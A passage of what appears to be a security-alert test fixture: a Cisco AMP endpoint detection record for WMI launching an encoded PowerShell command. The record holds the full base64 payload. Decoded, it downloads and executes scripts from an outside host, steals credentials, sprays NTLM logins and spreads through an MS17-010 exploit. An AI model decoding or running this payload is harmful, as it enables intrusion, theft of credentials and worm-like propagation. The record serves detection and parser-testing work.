pAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==" + ], + "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==", + "parent_app": "WmiPrvSE.exe", + "parent_app_path": "C:\\Windows\\System32\\wbem", + "parent_pid": 2236, + "parent_puid": 132461352663910600, + "parent_user": "SYSTEM", + "parent_user_sid": "010100000000000512000000", + "pid": 10724, + "puid": 132465072105597400, + "ts": 1602033881727175700, + "user": "user@testdomain.com", + "user_sid": "010100000000000512000000" + } + } + ], + "cisco.amp.bp_data.details.matched_activity.limited": false, + "cisco.amp.bp_data.details.matched_activity.matched": 1, + "cisco.amp.bp_data.details.schema": "endpoint", + "cisco.amp.bp_data.details.schema_epoch": 2, + "cisco.amp.bp_data.details.sig_id": 20190517123456, + "cisco.amp.bp_data.details.sig_rev": 5, + "cisco.amp.bp_data.detection": "apde:20190517123456", + "cisco.amp.bp_data.end_ts": 1610640884, + "cisco.amp.bp_data.engine": "apde", + "cisco.amp.bp_data.id": "d2616Ab846", + "cisco.amp.bp_data.name": "WMIPRVSE Launched Encoded Powershell Command", + "cisco.amp.bp_data.normalized.name": "wmiprvse launched encoded powershell command", + 